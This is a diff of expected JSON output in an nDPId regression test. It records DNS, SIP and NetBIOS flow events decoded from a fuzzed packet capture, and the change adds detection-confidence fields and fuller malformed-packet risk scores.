-00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":351,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470270925,"flow_last_seen":1120470270925,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470270925,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":35536,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":351,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470270925,"flow_last_seen":1120470270925,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470270925,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":35536,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":352,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470272927,"flow_last_seen":1120470272927,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470272927,"l3_proto":"ip4","src_ip":"94.168.1.2","dst_ip":"192.168.1.1","src_port":2768,"dst_port":4,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":1,"flow_last_seen":1120470272927,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470272927,"pkt":"ADBUADRWAODtAW69CABFAABIauAAAIARTHFeqAECwKgBAQrQAAQANDb28v4BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":2,"flow_last_seen":1120470276933,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470276933,"pkt":"ADBUADRWAODtAW69CABFAABIauEAAIARTHDAqAECwKgBAQrQADUANDb28v4BALIBAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":353,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470267925,"flow_last_seen":1120470276933,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470276933,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2768,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00618{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470102883,"flow_last_seen":1120470102883,"flow_idle_time":180000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"ts_msec":1120470284935,"l3_proto":"ip4","src_ip":"192.86.1.2","dst_ip":"200.68.120.99","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00912{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":353,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470267925,"flow_last_seen":1120470276933,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470276933,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2768,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470102883,"flow_last_seen":1120470102883,"flow_idle_time":180000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"ts_msec":1120470284935,"l3_proto":"ip4","src_ip":"192.86.1.2","dst_ip":"200.68.120.99","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470102883,"flow_last_seen":1120470102883,"flow_idle_time":180000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"ts_msec":1120470284935,"l3_proto":"ip4","src_ip":"192.86.1.2","dst_ip":"200.68.120.99","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470100319,"flow_last_seen":1120470100321,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470284935,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2753,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470100319,"flow_last_seen":1120470100321,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470284935,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2753,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470092317,"flow_last_seen":1120470092317,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470284935,"l3_proto":"ip4","src_ip":"192.98.1.2","dst_ip":"25.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470098867,"flow_last_seen":1120470098867,"flow_idle_time":180000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"ts_msec":1120470284935,"l3_proto":"ip4","src_ip":"192.169.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470098867,"flow_last_seen":1120470098867,"flow_idle_time":180000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"ts_msec":1120470284935,"l3_proto":"ip4","src_ip":"192.169.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470187655,"flow_last_seen":1120470187655,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470284935,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2759,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470284935,"flow_last_seen":1120470284935,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470284935,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2769,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":1,"flow_last_seen":1120470284935,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120470284935,"pkt":"ADBUADRWAODtAW69CABFAABEauIAAIARTHPAqAECwKgBAQrRADUAMPnuKv8AAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="}
-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470284935,"flow_last_seen":1120470284935,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470284935,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2769,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470284935,"flow_last_seen":1120470284935,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470284935,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2769,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":355,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470284936,"flow_last_seen":1120470284936,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470284936,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":117,"dst_port":2769,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":355,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":1120470284936,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120470284936,"pkt":"AODtAW4FADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgB1CtEARyVzAP+AAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
 00354{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":356,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":47,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":47,"pkt_l4_len":0,"ts_msec":1120470284937,"pkt":"ADBUADRWAODtAW69CABFAAAhauMAqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00199{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":356,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":13}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":357,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470117343,"flow_last_seen":1120470117343,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470298331,"l3_proto":"ip4","src_ip":"14.168.1.2","dst_ip":"192.168.1.1","src_port":2754,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":357,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1120470049696,"flow_last_seen":1120470116279,"flow_idle_time":180000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":6087,"flow_avg_l4_payload_len":507,"midstream":0,"ts_msec":1120470298331,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":357,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1120470049696,"flow_last_seen":1120470116279,"flow_idle_time":180000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":6087,"flow_avg_l4_payload_len":507,"midstream":0,"ts_msec":1120470298331,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00585{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":357,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470200673,"flow_last_seen":1120470200673,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470298331,"l3_proto":"ip4","src_ip":"192.22.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":357,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1120469540839,"flow_last_seen":1120470257655,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":1842,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1120470298331,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":357,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1120469540839,"flow_last_seen":1120470257655,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":1842,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1120470298331,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":357,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470202676,"flow_last_seen":1120470208684,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470298331,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00407{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":357,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1120470298331,"pkt":"qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":357,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690}
@@ -736,136 +736,138 @@
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1120470301328,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470301328,"pkt":"ADBUADRWAODtAW69CABFAABIauYAAIB\/TGvAqAECwKgBAQrSADUANCnz\/\/8BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJYnliZXJjaXR5AmRrAAAhAAE="}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":360,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470303331,"flow_last_seen":1120470303331,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470303331,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2770,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1120470303331,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470303331,"pkt":"ADBUADRWAODtAW69CABFBABIaucAAIARTGrAqAECwKgBAQrSADUANCnz\/\/8BAAABAAAAAACqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
-00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":360,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470303331,"flow_last_seen":1120470303331,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470303331,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2770,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":360,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470303331,"flow_last_seen":1120470303331,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470303331,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2770,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00423{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":361,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"ts_msec":1120470303562,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAFhOaugAAIARS2XAqAECwKgB\/wCJAIkAOlt2hSUBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="}
 00199{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":361,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":58}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":362,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470304312,"flow_last_seen":1120470304312,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470304312,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"120.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1120470304312,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1120470304312,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABO7ukAAIARS2TAqAECeKgB\/wCJAIkAOlt2hSUBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUKqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":362,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470304312,"flow_last_seen":1120470304312,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470304312,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"120.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":362,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470304312,"flow_last_seen":1120470304312,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470304312,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"120.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
